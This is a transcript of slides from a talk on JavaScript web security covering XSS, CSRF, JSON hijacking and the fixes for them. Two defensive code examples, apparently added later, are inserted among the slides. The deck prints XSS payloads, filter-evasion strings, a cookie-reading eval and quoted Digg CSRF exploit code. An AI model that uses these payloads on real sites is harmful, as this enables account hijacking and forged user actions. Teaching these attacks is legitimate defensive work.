JavaScript Security

    JavaScript Security - Presentation Transcript

    1. JavaScript Security jason harwig
    2. "How dangerous could this silly little toy scripting language running inside a browser be?" Jeff Atwood codinghorror.com stackoverflow.com
    3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
    4. "... nine out of 10 websites still have serious vulnerabilities ... (XSS) as the top vulnerability class" WhiteHat Security Website Security Statistic Report
    5. OWASP Top 10 2007
        1. XSS
        2. Injection Flaws
        3. File Exec
        4. Insecure Direct Object Reference
        5. CSRF
        6. Information Leakage
        7. Broken Auth
        8. Insecure Crypto
        9. Insecure Communications
        10. Failure to restrict URL access
    6. browser limitations
    7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
    8. var xhr = new XMLHttpRequest(); xhr.open(...)
    9. [diagram: NIC, Server, Google] * get or post
    10. var image = new Image(); image.src = url; * can detect connection success / failure
    11. [diagram: NIC, Server, Google] * get requests only | onload | onerror
    12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
    13. [diagram: NIC, Server, Google] * get requests only
    14. s = document.createElement('script'); s.type = 'text/javascript'; s.src = url; document.body.appendChild(s); * if JSON returned
    15. [diagram: NIC, Server, Google] * get requests only
    16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
    17. [diagram: NIC, Server, Google] * get or post
    18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
    19. black hat • XSS • CSRF • JSON hijacking • Cookie session hijacking • Internal network scanning • History checking
    20. cross-site scripting
    21. Browser IFrame same origin policy
    22. user input escape it!
    23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistent • Type 2 - Persistent
    24. type 0 var p = location.href.params; document.body.innerHTML = p
    25. Type 1 Search: <script>alert('xss');</script>
    26. Type 2 Please enter username: <script>alert('xss');</script>
    27. <c:out value="${var}" escapeXml="true"/> renders: Your Username: <script>alert('xss');</script>
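The escaping the slides call for, worked through as an added example (not code from the presentation): a JavaScript equivalent of JSTL's `<c:out escapeXml="true"/>` applied to the Type 1 "Search:" payload, with the unsafe string concatenation beside the escaped version. The render functions and payload constant are constructed for this demo.

```javascript
// Added example: output escaping for untrusted input landing in HTML element
// content. Equivalent to <c:out escapeXml="true"/>: the five characters that
// can change HTML structure are replaced with character references.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(input) {
  // String() also covers numbers/null; the regex hits every escapable char,
  // including '&' so already-escaped text cannot be smuggled through.
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Unsafe rendering (the Type 1 slide): user input is concatenated straight
// into the markup, so a <script> in the query becomes a <script> in the page.
function renderSearchUnsafe(query) {
  return `<p>Search: ${query}</p>`;
}

// Safe rendering: same template, but every untrusted value is escaped at the
// point where it lands in element content.
function renderSearchSafe(query) {
  return `<p>Search: ${escapeHtml(query)}</p>`;
}

// Constructed payload, the one shown on the slides.
const XSS_PAYLOAD = "<script>alert('xss');</script>";

console.log(renderSearchUnsafe(XSS_PAYLOAD)); // script tag survives
console.log(renderSearchSafe(XSS_PAYLOAD));   // rendered as text only
```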
    28. html filtering
    29. samy is my hero from http://fast.info/myspace/
    30. [chart: Friend Requests over time, 0 to 7,000, 12:34pm to 1:30pm]
    31. tag/attribute whitelist <div style="background:url( 'javascript:alert('xss')' )">
    32. 'javascript' stripped <div style="background:url( 'java\nscript:alert('xss')' )">
    33. \" stripped String.fromCharCode(34);
    34. innerHTML stripped eval('document.body.inne' + 'rHTML');
    35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
    36. to be continued..
    37. alternatives to escaping?
    38. google caja / ADsafe
    39. attack vectors to prevent?
    40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
    41. code eval continued <iframe src="java&#65533;script:alert('xss')"> </iframe>
    42. polluting global objects try { throw EvilArrayFunction; } catch (Array) { }
    43. xss lessons • Escape XML
    44. cross site request forgery the new kid
    45. [diagram: NIC, Server, Google]
    46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
    47. digg exploit code
        mf = window.frames["myframe"];
        html = '<form name="diggform" action="http://digg.com/diginfull" method="post">';
        html = html + '<input type="text" name="id" value="367034"/>';
        html = html + '<input type="text" name="orderchange" value="2"/>';
        html = html + '<input type="text" name="category" value="0"/>';
        html = html + '<input type="text" name="page" value="0"/>';
        html = html + '<input type="text" name="t" value="undefined"/>';
        html = html + '<input type="text" name="row" value="1"/>';
        html = html + '</form>';
        mf.document.body.innerHTML = html;
        mf.document.diggform.submit();
        from http://4diggers.blogspot.com/
    48. Fixes? • Referral checking? • quick cookie expiration? • post?
    49. solved session.setAttribute("token", token); <input type="hidden" value="${token}"/>
    50. double submit cookie
    51. digg link <a href="javascript:dig([num],[id],[digCheck])">digg it</a>
    52. digg submit js
        new Ajax.Request("/diginfull", {
          "method": "post",
          "parameters": "id=" + itemd + "&row=" + row + "&digcheck=" + digcheck + "&type=" + type + "&loc=" + pagetype
        });
    53. no diggcheck, no digg
    54. digg.com • Added random hash as post parameter • server verifies request
    55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
    56. HDIV • HTTP Data Integrity Validator
    57. rsnake joins twitter
    58. crossdomain.xml
        <?xml version="1.0" encoding="UTF-8"?>
        <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
            xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
          <allow-access-from domain="*.twitter.com" />
          <site-control permitted-cross-domain-policies="master-only"/>
          <allow-http-request-headers-from domain="*.twitter.com" headers="*" secure="true"/>
        </cross-domain-policy>
    59. http://www.yourminis.com/search_minis.aspx?q=XSS
    60. stealing your gmail contacts
    61. google contacts url contacts?out=js&callback=google
    62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
    63. google’s solution? • responseXml
    64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
    65. json hijacking
    66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
    67. So how do I do it? • Override Array • Source script
    68. demo
    69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
    70. “solved” continued • protect JSON services behind post
    71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
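The "secure comment" fix from the "solved" slide, as an added example (not code from the presentation): the server wraps the JSON in `/*-secure- ... */`, so a response loaded through `<script src=...>` (the Array-override trick) is one big comment and never evaluates, while the site's own same-origin XHR client strips the wrapper before parsing. Function names and the mock `secretStuff` response are assumptions for the demo.

```javascript
// Added example: JSON hijacking defence via a comment wrapper.
const SECURE_PREFIX = '/*-secure-\n';
const SECURE_SUFFIX = '\n*/';

// Server side: serialize, then make sure the payload itself can never close
// the comment early. '*/' can only occur inside a JSON string, and '\/' is a
// valid JSON escape for '/', so this rewrite leaves the parsed value intact.
function wrapSecureJson(value) {
  const json = JSON.stringify(value).replace(/\*\//g, '*\\/');
  return SECURE_PREFIX + json + SECURE_SUFFIX;
}

// Client side (used only by the site's own XHR code): refuse anything that is
// not wrapped, so a plain or truncated response is an error, not data.
function parseSecureJson(body) {
  if (typeof body !== 'string' ||
      !body.startsWith(SECURE_PREFIX) || !body.endsWith(SECURE_SUFFIX)) {
    throw new Error('response is not wrapped in the secure comment');
  }
  const inner = body.slice(SECURE_PREFIX.length, body.length - SECURE_SUFFIX.length);
  return JSON.parse(inner);
}

// Constructed response for the slides' "secretStuff" service.
const secretStuff = [{ sensitive_info: 'acct-1' }, { sensitive_info: 'acct-2' }];
const body = wrapSecureJson(secretStuff);

console.log(body);                      // starts with /*-secure-
console.log(parseSecureJson(body));     // the original array
```

The wrapper only matters for GET-able endpoints; the slides' other mitigation, putting JSON services behind POST, removes the `<script src>` vector outright.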
    72. Session hijacking
    73. demo
    74. internal network penetration
    75. history hijack
    76. demo
    77. resources
        • "Security Now! Podcast" twit.tv/sn
        • "Fortify" fortifysoftware.com/security-resources/
        • "WhiteHat Security" whitehatsec.com
        • "XSS Generator" ha.ckers.org/xss.html
        • "Jeremiah Grossman Blog" jeremiahgrossman.blogspot.com
        • "Samy is my Hero" fast.info/myspace
        • "Digg Hack" 4diggers.blogspot.com
        • "HDIV" hdiv.org
    78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com

    Jason Harwig, 3 years ago

    JavaScript, as it is today, is an insecure language

    © All Rights Reserved